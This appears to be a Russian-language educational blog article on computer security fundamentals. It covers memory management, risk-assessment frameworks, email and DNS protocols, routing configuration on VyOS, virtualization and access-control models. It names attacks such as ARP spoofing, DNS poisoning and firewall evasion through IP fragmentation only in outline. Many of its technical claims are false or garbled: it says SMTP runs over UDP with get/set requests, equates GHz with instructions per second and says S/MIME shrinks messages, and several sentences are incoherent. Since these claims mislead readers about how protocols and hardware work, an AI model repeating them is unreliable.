Пейджинг это схема управления виртуальной памятью, которая предполагает разделение физической памяти на блоки (страницы или кадры) фиксированного размера, например, по 4 Кбайт. Пейджинг прозрачен для прикладной программы. Когда программа загружается в память, она делится на страницы, такого же фиксированного размера. Как и страницы в физической памяти, которые загружаются в страницы/фреймы физической памяти.

Сегментация это другая схема управления памятью, которая предполагает разделение программ на блоки (сегменты) переменного размера. Использование сегментации заметно для прикладной программы. Каждый сегмент программы загружается в непрерывный блок физической памяти, что означает, что физическая память разделена на блоки разного размера. Каждый сегмент программы связан с семантической единицей программы (например, код, данные, библиотеки и т.д.).

В компьютере существуют исключения — это синхронные сигналы. Они возникают, когда в вашей программе происходит аномальное событие, например, деление на ноль или попытка доступа к недопустимой области памяти. Исключения обрабатываются операционной системой после обнаружения процессором, причем каждый тип исключения имеет идентификатор («вектор») и соответствующий обработчик.

Виртуальная память: виртуальные адреса позволяют распределять память относительно разных задач. Система преобразует эти логические адреса, используемые приложением (хранящиеся в виртуальной памяти), в страницу физической памяти (абсолютное распределение памяти) непосредственно перед выполнением. У памяти есть несколько уровней. Самый низкий уровень это CPU Register, на него наслаивается кеш как прослойка между CPU Register и Primary memory. И самый высокий уровень это ваш жесткий диск. Чем выше уровень, тем больше времени требуется на доступ к памяти. Если мы говорим о 64-битной системе, то его регистры начинаются с RAX, и могут содержать 64 различных 1 или 0. В компьютерах, вы можете увидеть его в такой записи rax: 0x00000000000008e7. В RAX включен EAX (32 бита), который в свою очередь включает в себя AX (16бит) -> AL (8 бит).

Разберем чуть более детально: у вас на компьютере установлена программа, которая имеет свою иконку на рабочем столе. Эта программа установлена на вторичном носителе, т.е. на жестком диске. Когда вы дважды кликаете на иконку для запуска программы, активируется основная память (RAM) и программа выгружается в RAM. После в дело включается CPU, обрабатывая информацию из памяти. В современных CPU много ядер, что позволяет выполнять много процессов одновременно. А параметр Ghz для CPU описывает кол-во инструкций, которое CPU может обработать в секунду.

Чипсеты могут эффективно работать без ведома микропрограммы, ОС или гипервизора. Насколько мне известно, невозможно подменить какой-либо компонент более низкого уровня, чем этот, поскольку он уже настолько близок к «голому металлу», насколько это возможно. Это кольца с отрицательным номером, так, кольцо уровня -3 это чипсет на CPU. Поэтому так сложно детектировать руткины на кольце -3. Другая релевантная история это IVT (Interrupt vector table), которая хранит каждую запись, так называемый вектор прерывания, в основной памяти и управляет потоком выполнения. Прерывания — это сигналы, подаваемые аппаратным или программным обеспечением, когда процесс или действие требует немедленного внимания. Прерывания являются асинхронными, то есть они могут произойти в любое время. Клавиатурам и мышам необходим мгновенный доступ к компьютеру при их использовании, поэтому они используют прерывания, т.к. требуется обращение от системы к внешнему устройству, работающему не синхронно с центральным процессором. Асинхронные операции — мы можем в любой момент нажать клавишу мышки и она сработает.

Разница между виртуальной и физической памятью. Физический адрес это фиксированный адрес места в физической памяти компьютера. Скомпилированная программа внутренне ссылается на ячейки памяти, используя виртуальный адрес, который переводится в физический адрес памяти машиной, на которой она выполняется во время выполнения.

Использование управления виртуальной памятью имеет много преимуществ: оно позволяет загружать программу в любое место физической памяти машины без перекомпиляции. Также, программу не нужно загружать в непрерывный блок физической памяти — пейджинг позволяет использовать несмежную память, тем самым облегчая проблемы фрагментации памяти. Если память ограничена, управление виртуальной памятью позволяет загружать в физическую память только части программы. Благодаря этому, процесс может работать в системе с меньшим объемом памяти, чем требуется процессу). Также, оно позволяет разделить процессы по уровням безопасности с помощью системы управления памятью.

Существует два различных способа разделения виртуального адресного пространства: использование блоков фиксированного размера (страниц) или логических блоков (сегментов). Если некорректно использовать память, то злоумышленник может провести атаку stack smashing. Переполняется буфер и некая программа получает доступ к участку памяти, к которому у нее не должно быть доступа. Или друга популярная атака — Arc injection, передает управление некому коду в памяти. Атака TOCTOU (TOCTOU — time-of-check-to-time-of-use) — когда несколько программ обращаются к одинаковым данным, и вредоносная программа может попробовать изменить данные после их проверки, но до их использования. Это атака в формате гонки, борьба с ними весьма проста: атомарные операции. Получается весьма общирная attack surface, т.е. получается довольно много точек входа, доступных злоумышленнику.

Тот факт, что пейджинг прозрачен для приложений, является как преимуществом, так и недостатком. Преимуществом прозрачности является отсутствие накладных расходов, но недостатком является то, что подкачку нельзя использовать для применения политик. Аналогично, тот факт, что сегментация непрозрачна, является одновременно и недостатком (она налагает на приложение бремя ведения бухгалтерского учета), и преимуществом (она позволяет использовать различные сегменты для разных целей и отдельно рассматривать их с точки зрения политики безопасности).

Обе схемы имеют накладные расходы на фрагментацию. Пейджинг приводит к внутренней фрагментации, когда некоторые страницы фиксированного размера используются не полностью. Сегментация приводит к внешней фрагментации, когда различные размеры сегментов означают, что участки адресного пространства памяти не могут быть выделены сегменту. В современных архитектурах и операционных системах используется комбинация сегментации и постраничной сегментации (т.е. постраничная сегментация).

Если используется постоянная память, то она хранит информацию даже без подачи питания на устройство. Которое, потенциально, могу и украсть. Поэтому на физическом устройстве требуется дополнительная защита от физического вмешательства, например, датчик света с автоматическим удалением данных.

Другая уязвимая часть железа это system management mode (SMM), работает на архитектуре x86, и отвечает за работу кулеров, работу с ошибками памяти, и руткиты могут атаковать SMM через SMRAM (System Management RAM). Руткиты — это программное обеспечение, обычно вредоносное, предназначенное для обеспечения доступа к компьютерной системе, которое часто маскирует свое существование для ОС.

Еще одна полезная железка в компьютере это TPM, в мире крипто-процессоров это стандарт ISO/IEC 11889:2015. TPM это аппаратное обеспечение, специально созданное для того, чтобы служить новым корнем доверия, часто используемым для поддержки вычислений, связанных с криптографией. Секреты же хранятся на SE. TPM состоит из генератора случайных чисел, генерации криптографических ключей, и возможности их верификации. TEE это области на чипсете для чувствительных вычислений, но они не изолированы физически от остальной части чипа. Область чипсета TEE (Trusted execution environments) работает аналогично TPM, но она не изолирована от остального чипсета. И имеет свои выделенные память, процессорсные ресурсы и I/O, примеры это ARM, AMD, IBM, Intel (SGX), RISC-V.

Самый надежный это дискретный TPM, используется в критических системах. Интегрированный TPM используется в менее критичных системах, но он также очень надежен. Существует TPM 2.0, и разработчики Windows ожидают, что в системе будет установлен TPM 2.0, и любая система без него выходит за рамки того, что поддерживает Windows. Для установки Windows 11 требуется наличие TPM 2.0 и, чтобы она была включена в BIOS. Если у вас нет этого криптопроцессора, PC Health Check выдаст ошибку «Запуск Windows 11 на этом компьютере невозможен» и вы не сможете установить Windows 11.

Оценка рисков

Во время разработки нужно придерживаться базовых принципов, таких как безопасность должна быть упреждающая и превентивная. Например, в интерфейсе, настройки по умолчанию должны обеспечивают высокий уровень безопасности, а сам продукт соответствовать требованиям и рекомендациям GDPR, PMRM, NIST, MITRE. Оценка безопасности это лишь средство, с помощью которого можно определить, насколько успешно достигаются цели безопасности объектом оценки (человеком/организацией/сетью и т.д.).

Для выбора правильного «средства», держим в голове типичный линейный процесс атаки:

1. Разведка
2. Оружие
3. Доставка
4. Эксплуатация
5. Установка
6. Командование и управление
7. Действие по целям

И если вы считаете, что средством по умолчанию является CAPEC, то скорее всего вы не правы. MITRE отмечает, что CAPEC следует использовать для:

• моделирования угроз для приложений
• обучение и тренировка разработчиков
• тестирования на проникновение.

И не CAPEC единым. Существует еще и ATT&CK. MITRE отмечает, что ATT&CK следует использовать для:

• сравнения возможностей защиты компьютерных сетей
• защиты от современных постоянных угроз
• поиска новых угроз
• улучшения разведки угроз
• упражнения по имитации противника

Далее, описываем потенциальный риск по DREAD:

• Damage: насколько серьезные последствия от атаки?
• Reproducibility: как сложно атаку воспроизвести?
• Exploitability: насколько сложно атаку провести?
• Affected users: как много людей будут заэффекчены?
• Discoverability: насколько легко обнаружить угрозу?

И указываем потенциальный тип атакующего:

• Злоумышленники, занимающиеся промышленным шпионажем, целью которых является продажа секретов компании
• Скриптовые дети
• Вредоносные хакерские группы
• Национальные правительства
• Хактивисты
• (Кибер-)террористы
• Передовые постоянные угрозы
• Организованная преступность

Думаем, как мы будем реагировать на угрозы:

• Проактивно: усилия до возникновения инцидентов. Это включает в себя наличие политик безопасности, исправлений, защиту памяти (через управление памятью), аутентификацию пользователей и контроль доступа. Если пользователь видит иконку Adobe Acrobat или Skype, то он должен быть уверен, что это на самом деле легитимная программа, а не вирус. Файл под названием «update.exe» должен вызвать подозрения даже у уборщика. Чуть более опытные пользователи должны понимать, что такое supply chain attack и внимательно скачивать установщики Google Chrome, Windows Update, Zoom и прочих. Если видят CloudFront или filehippop, то немедленно закрывают вкладку.
• В режиме реального времени: усилия по обеспечению и поддержанию безопасности, т.е. пресечение нарушений безопасности в тот момент, когда они вот-вот произойдут (например, брандмауэр, система обнаружения вторжений и антивирусное программное обеспечение, типа ClamAV).
• Реактивно: усилия по обнаружению и реагированию на нарушения безопасности после того, как они произошли. Примеры реактивных усилий включают антивирусное сканирование или реагирование на инциденты специальными группами кибербезопасности.

Также, андерсон выделил три типа нарушений безопасности, что является основной для CIA:

1. несанкционированное разглашение информации (конфиденциальность)
2. несанкционированная модификация информации (целостность)
3. несанкционированный отказ в использовании (доступность).

Каждому параметру присваивается значение от 0 до 10. И считается DREAD = (damage + reproducibility + exploitability + affected users + discoverability) / 5.

Как видно по набору пунктов выше, существует множество способов классифицировать практически все, что угодно, ярким примером считается CERT-RMM. В этом можно закопаться и тратить тысячи рабочих часов на документирование всего и вся. Но обычно бизнес хочет от нас resilience, и это не риск менеджмент. Это более широкое понятие, в которое входит обеспечение непрерывности бизнеса. Включая мониторинг. Но в первую очередь речь о бекапах, бесперебойном электропитании, возможность компании функционировать без временного доступа к IT, понимание взаимосвязанности сервисов.

Чтобы выбрать в перечисленных выше пунктах правильные для вас, надо понимать тип организации. В критической инфраструктуре существует защита от природных явлений, на это не получится реагировать реактивно. Так, защита электрической сети начинается с защиты генераторов. Если частота подачи слишком низкая или слишком высокая, генератор должен отключаться электросети автоматически, так мы избежим повреждений оборудования. Если не хватает электричества, то нужны приоритеты на подачу электричества в больницы, ядерные реакторы, метро и прочие важные объекты города. Если же подача тока слишком высокая, то должно сработать реле защиты, разомкнуть линию и предотвратить повреждение оборудования на каждой стороне линии. Аналогично, для химических предприятий полагаемся на стандарт IEC 61511 и Distributed Control Systems (DCSs).

Существует отдельный класс устройств CPS Cyber-Physical System, которые требуют особой защиты. Например, вирус Stuxnet умел манипулировать PLC, и был направлен против Иранской ядерной программы. Что приводило к некорректной скорости вращения моторов и, как следствие, не позволяло настроить процесс обогащения урана. Это уже близко к концепции военных конфликтов.

Один из очевидных способов уменьшить шанс взлома — полная изоляция от интернета и диоды данных внутри. Так как в критической инфраструктуре многие устройства старые и без обновлений, то нужно использовать bump-in-the-wire, который обеспечивает целостность, аутентификацию и конфиденциальность сетевым пакетам. Для беспроводных сетей есть wireless shield, который глушит все небезопасное и неразрешенное. Но это не избавит нас от необходимости тестировать безопасность.

Тестирование безопасности бывает разным. Например, аудит это оценка правил системы. Или вы нанимаете внешних red team, заказывая им тестирование по методике black box, gray box или white box, что по факту кол-во информации, с которым они начнут тест. Также, не забываем про официальные методологии, такие как NIST, OWASP.

В типовой практике, каждое обновление Windows важный критически важное, так как оно исправляет уязвимости. Но также, это потенциальные новые уязвимости. Да, установка обновления — лотерея. Но и тут есть решение. Если у вас много вычислительных ресурсов — создайте тестовую группу windows-устройств со схожими сервисами, и устанавливайте на малую группу. Мало ресурсов — ищите проблемы в Интернете с названиями KB, делайте бекапы, устанавливайте предпоследние обновления, сейчас нет проблем деинсталировать обновление. Или гибко настроить установку обновлений с помощью PDQ deploy. Тогда можно уменьшить кол-во тестов безопасности.

Если у вас есть внутренняя разработка, то вам нужно тестировать на уязвимости ваш продукт. Тестирование готового продукта может быть продукто-ориентированным и процессо-ориентиррванным. Первое про тестирование самого продукта, что может давать разные результаты в зависимости от множества условий. Что не всегда хорошо с точки зрения продажи софта. Например, разные антивирусы в разных тестах показывают разные результаты. Как бы то ни было, любая проверка должна включать себя проверку функциональности, эффективности, и тщательность самой проверки. На данный момент актуальной является оценка CC. Как пример, рассмотрим семь уровней оценки безопасности OS:

• EAL 1 — минимальные затраты на оценку, оценка производится на основании выполнения функций продукта по документации продукта.
• EAL 2 — производитель предоставляет документацию и результаты теста анализа на уязвимости. Тестировщик воспроизводит аналогичные тесты по документации.
• EAL 3 — от разработчика, который уже придерживается подходов к правильному проектированию софта с точки зрения ИБ. Учитывается конфигурация, высоуокровневый дизайн софта.
• EAL 4 — изучается низкоуровневый дизайн, исходный код, и процесс. RedHat соответствует EAL 4, но это не строгие требования.
• EAL 5 — строгий подход к разработке.
• EAL 6 — вест код должен быть удобочитаемым и структурированным, ожидается серьезный пентест. Astra Linux Special Edition соответствует EAL 6, с заявкой на EAL 7.
• EAL 7 — разработчик должен подтвердить, что все security-функции работают должным образом. Будет сложное и долгое тестирование.

Сетевые протоколы

Первое, что надо понять, это голое знание протоколов без навыков работы с конкретным оборудованием не имеет ценности. Но без теории никуда. Поэтому поговорим про электронную почту как популярную цель для атаки. В целом, путь письма от отправителя до получателя выглядит следующим образом: Отправитель -> MUA -> MSA -> MTA -> MDA -> MUA -> получатель. Стандартный протокол для передачи электронной почты это SMTP через TCP на порту 25. Для получения используются протоколы POP3, IMPA, MAPI. В перечисленных протоколах зачастую не учтена аутентификация. Отсутствие конфиденциальности, приватности, целостности, доступности, и наличие СПАМа — все это проблемы почты. Для конфиденциальности хочется внедрить e-to-e шифрование, но отправителю нужно знать ключ шифрования получателя перед шифрованием, что из коробки недоступно, ключами нужно обменяться заранее. S/MIME и PGP решают проблему, но они далеко не везде используются. Для подписи ключей я бы выбрал скорее x509v3, чем PGP. Либо другое простое решение: от отправителя к MTA/MSA можно использовать TLS для защиты, а на участке от MSA к DNS на помощь придет DNSSEC. И для получения сообщения из MDA также TLS (transport layer protocol нужен для аутентификации, целостности данных, конфиденциальности).

MUA на схеме это представление пользователя. Разумеется, под пользователем мы подразумеваем программу, в которой нажимается кнопочка «Отправить письмо». MTA это роутер, который пересылает сообщение ближе к получателю. S/MIME отвечает за аутентификацию SHA-256, конфиденциальность, компрессию.

Если говорить про PGP, то в нем есть фундаментальная архитектурная проблема в серверах ключей. Вот полный список проблем. Но для электронной почты можно использовать решения продукты Proton Mail и добавлять сверху PGP — оно для него и задумывалось. Попроще: по DH-протоколу согласовать общий ключ, потом зашифровать и отправлять по почте.

Теперь поговорим про SMTP. Это протокол по принципу запрос/ответ, работает поверх UDP, запрос может быть типа get и set. Потихоньку заменяется HTTP, то есть да, HTTP можно использовать и для общения сетевых устройств. Существуют и более новые альтернативы RIFT, Netconf. И основная проблемы SMTP — передача получателя в открытом виде и невозможность верификации отправителя. Да, есть сертификаты. Но для роутинга почты надо передать RCPT TO:. И если domain — та штука, которая реально нужна, то user — нет. Для того, чтобы письмо прилетело к серверу, user не нужен вообще. TLS не помогает, так как есть транзитные сервера. Соответственно, его не требуется передавать в открытом виде. SMTP полностью раскрывает факт переписки. Даже если тело письма шифровано. Соответственно, правильная схема, это шифровать имя получателя открытым ключом и расшифровывать на сервере, который обслуживает этот домен. Так можно сохранить конфиденциальность получателя.

Итак, SMTP и IMAP для почты, HTTP для сайтов и теперь еще для общения сетевых устройств. RFC 822 и MIME определяют структуру электронного письма, HTML определяет как строится веб-страница. У SMTP много вариаций, например, STARTTLS, который добавляет конфиденциальность и аутентификацию. SMTP сам по себе не умеет передавать файлы, лимитирован 7-битным ASCII. У SMTP всего три шага: все начинается с команды MAIL, в которой указывается идентификатор отправителя. Затем следует серия из одной или нескольких команд RCPT, дающих информацию о получателе. Затем команда DATA передает почтовые данные. И, наконец, индикатор окончания почтовых данных подтверждает транзакцию.

RFC 822 говорит нам, что у сообщения может быть тело и заголовок в кодировке ASCII. Чтобы сообщение умело не только лишь в текст, но и в файлы, используется MIME. Он определяет типы данных, например image/gif или image/jpeg, а еще все они могут содержать php-код и антивирусы это до сих пор плохо детектят. Обычный текст также может стать text/richtext. Но MIME по прежнему работает только с ASCII, и кодирует в base64. Передача письма работает на SMTP, но на данный момент можно встретить и IMAP, и POP. Последние два, IMAP как и SMTP отправляет сообщение по TCP на почтовый сервер. S/MIME также уменьшает вес сообщения.

DNS. Почти всё в Интернете зависит от DNS, который возвращает правильный номер для правильного запроса. Чтобы плохие ребята не изменили идентификатор транзакции, протокол добавляет «случайное» число от 0 до 65535. Сервер реальных имен знает это число, потому что он содержался в запросе. Злодей не знает и в лучшем случае, он может догадаться. Для этого применяется TTL, но TTL не является фичей безопасности. Если злоумышленник попробует ответить случайным числом не 1 раз а 100 раз, вероятность его успеха меняется с 65536 к 1 до 655 к 1. И в арсенале злоумышленников по прежнему есть cache poisoning, QID guessing, и многое другое. А также, DNS уязвим для плохих ACL маршрутизаторов. Но теоретически, отравление DNS не должно иметь значения, поскольку все важное защищено SSL. Лучше иметь на вооружении PowerDNS.

Попрактикуемся с DNS. Почти на всех компьютерах существует встроенная команда nslookup. Вбив в терминал по очереди nslookup, set type=MX, targetsite.com, можно получить MX-записи (Mail Exchange), т.е. почтовые сервера. Также, включение дебага производится командой set debug, и set type=any. Последняя команда устанавливает тип запроса «any«, позволяя DNS возвращать записи любого типа. Теперь можно вводить любой адрес, например, http://www.mhss.gov.na/.

На самом деле адрес www.example.edo.com читается справа налево, потому что .com выше всех в иерархии. За эту зону отвечает ICANN.

А запись на сервере будет выглядеть примерно так:

(princeton.edu, dns.princeton.edu, NS, IN)
(dns.princeton.edu, 128.112.129.15, A, IN)

Но из чего состоит URL-адрес? Существует три различных уровня идентификаторов — доменные имена, IP-адреса и физические сетевые адреса. Преобразование идентификаторов одного уровня в идентификаторы другого уровня происходит в различных точках сетевой архитектуры. Во-первых, пользователи указывают доменные имена при взаимодействии с приложением, т.е. пользователь вводит адрес сайта в браузерную строку. Во-вторых, приложение задействует DNS для преобразования этого имени в IP-адрес; в каждую датаграмму помещается именно IP-адрес, а не доменное имя. Доменное имя нужно только для людей. В-третьих, выполняется пересылка IP-адреса на каждом маршрутизаторе, что часто означает преобразование одного IP-адреса в другой, то есть преобразование адреса конечного получателя в адрес следующего маршрутизатора. Наконец, IP задействует протокол разрешения адресов (ARP) для преобразования IP-адреса следующего хопа в физический адрес этой машины. Протокол разрешения адресов (ARP) в том числе используется для идентификации хостов в сети путем отправки запросов по локальной сети, прося хосты, имеющие определенные IP-адреса, ответить своим MAC-адресом. Следующим хопом может быть конечный пункт назначения или промежуточный маршрутизатор.

На этом замечательном пути может случиться ARP spoofing — атака, при которой злоумышленник получает полный контроль над IP-трафиком в конкретном даталинке. Протокол ARP не проверяет подлинность полученных запросов и ответов, и все равно их кеширует. Иногда можно встретить мнение, что протокол SPF позволяет публиковать адреса и обезопасить себя от злоумышленника, но если злоумышленник может вмешаться в TCP, то и SPF не поможет. SPF просто отмечает неправильные IPшники. DKIM — протокол для подписи сообщений, вот он частично поможет от spoofing.

DNSSEC-bis — по RFC 1912 это лучшая практика для DNS-администраторов. Основная цель DNSSEC это дать возможность получателю DNS-сообщения проверить его содержимое. По сути, в DNS сообщение добавляется электронная подпись, что решает проблему распространения secret key.

Пакеты могут и должны дробиться на маленькие пакетики. Так, RFC 791 позволяет отправлять фрагментированные пакеты, которые будут восстановлены в пункте назначения на основе перечисления смещений. Так можно обойти некоторые брандмауэры, скрывая флаги TCP в пакете со смещением 1 и полностью опуская их со смещением 0. Брандмауэры, фильтрующие пакеты, имеют ограниченную память, поэтому могут кэшировать фиксированное количество смещений, прежде чем память закончится. IP-датаграммы должны быть пересобраны перед прохождением вверх по стеку.

Первая команда может выглядеть следующим образом, на эту команду должен быть получен ответ 250 OK или 550 Failure.

MAIL <SP> FROM:<reverse-path> <CRLF>
RCPT <SP> TO:<forward-path> <CRLF>
DATA <CRLF>

Другая полезная команда это server, например server 193.63.81.33. Если же у вас есть желание покопаться в DNSSEC, то для этого подойдет сервис типа https://dnssec-analyzer.verisignlabs.com/.

PPP используется для прямого общения между роутерами, чтобы никто не посредничал. PPP также использовался для предоставления диалап-доступа к интернету. PPPoE работает по интернету, и ATM PPPoE для поддержки соединения интернета по DSL.

MPLS (MultiProtocol Label Switching) — добавляет заголовок в каждый пакет, и дальнещая маршрутизация происходит за счет этого заголовка, а не за счет IP-адреса. MPLS живет посерединке между IP и PPP.

Один из протоколов аутентификации это PAP. PAP работает очень примитивно: отправляет логин/пароль на сервер и получает ответ. Обычно работает вместе с PPP, PPPoE для DSL. Но весьма уязвим и лучше выбрать CHAP. CHAP поддерживает 3-х этапное рукопожатие, но сам по себе также не безопасен, так как нет шифрования. Можно перехватить логин и запустить offline dictionary attack. Также, MS-CHAP 1 и 2 уязвимы к L0phtcrack.

Протокол DANE позволяет X.509 сертификаты проассоциировать с DNS через DNSSEC. DANE также работает с новым типом DNS — TLSA.

Другие интересные протоколы:

UDP — это простой протокол, обеспечивающий доставку дейтаграмм, так как Заголовок дейтаграммы UDP включает контрольную сумму, которая позволяет получателю обнаружить случайные повреждения данных. Если на DHCP заблокировать порты 67 и 68, или DNS на порту 53 с блокировкой TCP. Часто достаточно перезапустить DHCP, DNS и NTP. Дополнительные функции вроде acknowledgment могут быть предоставлены верхними уровнями. Это для стриминга, игр. L2TP также работает по UPD, используется для PPP-сессии. Оно не предоставляет никакой безопасности, но L2TP можно передавать по IPsec. UDP отличная основа для RPC — удаленного вызова процедур.

DHCP — предоставляет IP-адрес. У любого устройства в сети должен быть уникальный IP-адрес, который автоматически передается по DHCP. Также, каждая сеть должна иметь свой DHCP-сервер. Это пересылка сообщений, а для роутинга можно взять OSPF. OSPF самый популярный протокол для роутинга Интернета IPv4, IPv6, CIDR.

Протоколы могут быть внутренними и внешними по типу использования: внутренние RIP, OSPF. Внешние BGP. Также, протоколы можно делить на Вектор расстояния (RIP), вектор пути (BGP), состояние соединения (OSPF) и гибрид по принципу использования.

Пример настройки BGP: предположим, у нас 6 роутеров, и каждый роутер анонсирует по BGP свою локальную сеть.

Если рассматривать операционную систему VyOS, то она умеет работать в двух режимах. Первый, в который по попадаем сразу после логина это оперативный режим. Вводим три простые команды:

show interfaces
show ip route
show bgp ipv4

Эти команды выведут все сетевые интерфейсы, таблицу маршрутизации текущей системы и таблицу маршрутизации BGP системы.

Настало время отправить сетевые пакеты и посмотреть, как они будут бегать между роутерами. Команда для этого ping 10.99.15.1 source-address 10.99.10.1 & . Эта команда будет постоянно отправлять пакеты с IP 10.99.10.1 на 10.99.15.1, и получающая сторона будет отвечать пакетами с IP 10.99.15.1 на 10.99.10.1. После потребуется команда tcpdump для отображения деталей по отправленным пакетам, своего рода аналог Wireshark, Azure Network Watcher, ManageEngine OpManager, SolarWinds NetFlow Traffic Analyzer. Первая команда ifconfig -a|less покажет имена интерфейсов, и далее tcpdump -c40 -i eth0 для отображения 40 первых пакетов. Можно увидеть, какие пакеты улетают мимо прокси. Покажет Timestamp, Source IP и порт, также айпишник и порт точки назначения.

Далее, с помощью команды configure, перейдем в режим конфигурации. Нужно ввести следующие команды:

set protocols static route 10.99.14.0/24 next-hop 10.0.3.13
set protocols bgp address-family ipv4-unicast network 10.99.14.0/24
commit
exit

Это позволит настроить передачу пакетов из роутера a на роутер b. Даже не смотря на то, что это не будет являться наилучшей конфигурацией с точки зрения сети. Итого, нам точно нужно знать linux-команды: ip, ip link, ip address, ip route, ping, ifconfig, route.

OSPF: подсчитывает вес, по какому маршруту сколько стоит доставить пакет данных.

RADIUS: протокол на уровне приложения, нужен для аутентификации и авторизации пользователей.

VXLAN для больших масштабов в облаках.

User Authentication protocol: аутентификация пользователя на сервере.

Kerberos 5 — протокол. Версия 4 сильно отличается от пятой, и состоит из 6-и сообщений. Обеспечивает централизированный сервер аутентификации, Это протокол аутентификации и последующей авторизации.

• Для начала пользователь отправляет незашифрованный запрос к серверу с запросом на доступ к некому сервису
• Сервер аутентификации валидирует запрос, и генерирует TGT
• TGT отправляется обратно к пользователю, вместе с секретным ключем
• Пользователь дешифрует сообщение от сервера, и отправляет новое сообщение новому серверу — TGS (Ticket Granting Server). Сервер генерирует ST.
• Сообщение от TGS опять улетает на сторону пользователя и уже после этого обратно улетает на целевой сервер
• Сообщение от целевого сервера отправляется пользователю, и в этот момент уже у всех есть сессионные ключи,

Виртуализация

Виртуализация это когда несколько разных инстансов ОС работают на одном устройстве. Эмуляция же симулирует архитектуру железа, а значит вирусы, предназначенные для атаки на железо, попросту не сработают. И контейнеризация позволяет одному программному обеспечению никак не связывать свои ресурсы с другим софтом, в чем-то схожая логика со вкладками браузера. В типичном варианте, архитектура будет выглядеть примерно так: пользовательские приложения > алгоритмы > языки программирования > операционные системы > прошивка > микроархитектура > RTL (Register Transfer Level, поведение уровня SystemVerilog) > Gate Level > Транзисторы.

Так, виртуализация воспроизводит полноценный компьютер со всеми устройствами. Виртуализация на уровне сервиса это когда веб-сервер обеспечивает ресурсами несколько веб-приложений. На уровне операционной системы, виртуализация предоставляет ресурсы нескольким OS. Контейнеры же живут в рамках одной OS, но с общим ядром. Сетевые контейнеры обеспечивают сетевую инфраструктуру, известный пример это например VLAN. Контейнеры легче виртуальных машин. Зато виртуализация CPU позволяет получить множество маленьких CPU под разные задачи.

Эмуляция имитирует другое оборудование и требует интерпретатора для выполнения кода, предназначенного для другой аппаратной архитектуры. Виртуализация предполагает тот же тип аппаратного обеспечения, на котором работает софт (что означает, что интерпретация не требуется). Другими словами, при виртуализации мы можем одновременно работать с разными ОС на одном и том же оборудовании. Контейнеризация позволяет одной ОС держать приложения изолированными друг от друга и не использовать совместно библиотечные ресурсы.

Также, контейнеризация делает ваше веб-приложение переносимым. Эта технология заключается в упаковке приложения вместе с сопутствующими библиотеками, конфигурационными файлами и вспомогательными зависимостями в единый программный пакет (контейнер). Контейнер не зависит от операционной системы хоста, что позволяет ему работать практически на любой платформе.

Гипервизор позволяет создавать ОС внутри ОС, именно так работают VirtualBox, VMWare и QEMU. Но если атакован гипервизор, то все установленные ОС также под угрозой.

Контроль доступа

Я делю контроль доступа на три подхода: access control matrices, capabilities, access control lists.

Access control matrices:

• определение авторизованного доступа во время выполнения: это просто (просто найдите соответствующую запись в таблице, за исключением того, что таблица может быть очень большой, поэтому может потребоваться прочитать много данных, чтобы найти нужную запись)
• добавление доступа для нового принципала: не так просто — необходимо создать и заполнить новую строку в матрице
• удаление всех доступов для принципала: относительно просто, поскольку это означает простое удаление строки в матрице контроля доступа
• определение всех принципалов, имеющих доступ к определенному объекту: относительно просто, так как это включает проверку соответствующего столбца матрицы
• создание нового объекта, к которому все принципалы имеют доступ по умолчанию: относительно просто, поскольку это означает создание столбца в матрице контроля доступа со всеми записями «положительными».

Capabilities (т.е. список для каждого принципала, указывающий объекты, к которым можно получить доступ, и соответствующий строке матрицы управления доступом):

• определение санкционированного доступа во время выполнения: просто, так как необходимо изучить только один набор возможностей (т.е. для соответствующего принципала)
• добавление доступа для нового принципала: просто (как описано выше)
• удаление доступа принципала: просто (как описано выше)
• определение всех принципалов, имеющих доступ к определенному объекту: не просто (возможно, невыполнимо), поскольку необходимо проверить все возможности, имеющиеся у каждого принципала
• создание нового объекта, к которому все принципалы имеют доступ по умолчанию: не так просто, поскольку каждому принципалу нужно будет предоставить новую возможность.

Access control lists (т.е. список для каждого объекта, в котором указаны принципалы, имеющие доступ к этому объекту, и который соответствует столбцу матрицы контроля доступа):

• определение авторизованного доступа во время выполнения: разумно, пока доступ к списку управления доступом для каждого объекта прост
• добавление доступа для нового принципала: не просто, поскольку список управления доступом каждого объекта должен быть изменен (по крайней мере, все объекты, к которым новый принципал должен получить доступ)
• удаление доступа принципала: не просто, так как список контроля доступа каждого объекта должен быть проверен и, при необходимости, изменен
• определение всех принципалов, имеющих доступ к определенному объекту: просто — достаточно проверить ACL для этого объекта
• создание нового объекта, к которому все принципалы имеют доступ по умолчанию: просто (как описано выше).

Теперь поговорим о фундаментальных основах. Аутентификация это проверка, имеется ли право на пользование неким ресурсом. Для этого требуется идентифицировать личность, например, на основе секретного вопроса, паспорта, биометрии. Авторизация же отвечает на вопрос «что этот человек имеет право делать?». Речь о контроле доступа к защищенным ресурсам. Например, пользователю может быть доступен только слепой доступ к файлу на запись, т.е. имеется разрешение на запись в файл, но отсутствует возможность на чтение файла. Обычно авторизация зависит от аутентификации пользователя и идет после аутентификации. Если аутентификация пользователя нарушена, то злоумышленники могут маскироваться под других легитимных пользователей и, в свою очередь, получить доступ к внутренним ресурсам компании.

Существуют разные концепции управления правами. Их условно можно поделить на мандатную и дискретную. Предполагается, что мандаторная модель дополняет дискреционную. Например, BIBA-модель: no write up, no read down. Или модель Белл-ЛаПадула (BLP): выполнять, читать, добавлять, писать, но при условиях no write down, no read up. В модели Белл-ЛаПадулы, формально, троянский конь никогда не сможет украсть секретные данные. Уровень доступа может храниться на субъекте и на объекте. Модель BLP не позволяет пользователям читать информацию выше своего уровня доступа и записывать информацию ниже своего уровня, т.е. файл может быть доступен только для чтения и для записи. BLP далека от идеала, так как присутствует деклассификация, нарушение логики доступа к данным при обработке потока информации в распределённой среде. Обе модели непрактичны для реального использования по следующим причинам:

• Статические уровни безопасности. Модели не учитывают изменения в уровнях безопасности. Это означает, что в принципе человек может получить больший или меньший доступ в какой-то момент, и модель не сможет учесть это изменение.
• Дискреционная политика привязана к личности (когда обычно важны права доступ на ресурсу), в то время как обязательная политика не зависит от личности (когда важна характеристика ресурса).
• Не совместимы друг с другом. BLP — это модель конфиденциальности, которая напрямую несовместима с моделью Biba (они являются инверсиями друг друга).
• Ее трудно применять, так как она предполагает честных и рациональных участников — например, она не справится с инсайдерской угрозой, сговором или несчастными случаями.

Более практична модель Кларка-Вилсона (Clark-Wilson). Эта модель формирует практику разделения обязанностей относится к построению простых систем (т.е. не делающих много вещей одновременно). Вместо этого мы разделяем функциональные обязанности. Ее характеризуют хорошо сформированные транзакции и разделение обязанностей:

1. Субъект должен быть аутентифицирован
2. Объект может манипулироваться только ограниченным набором программ
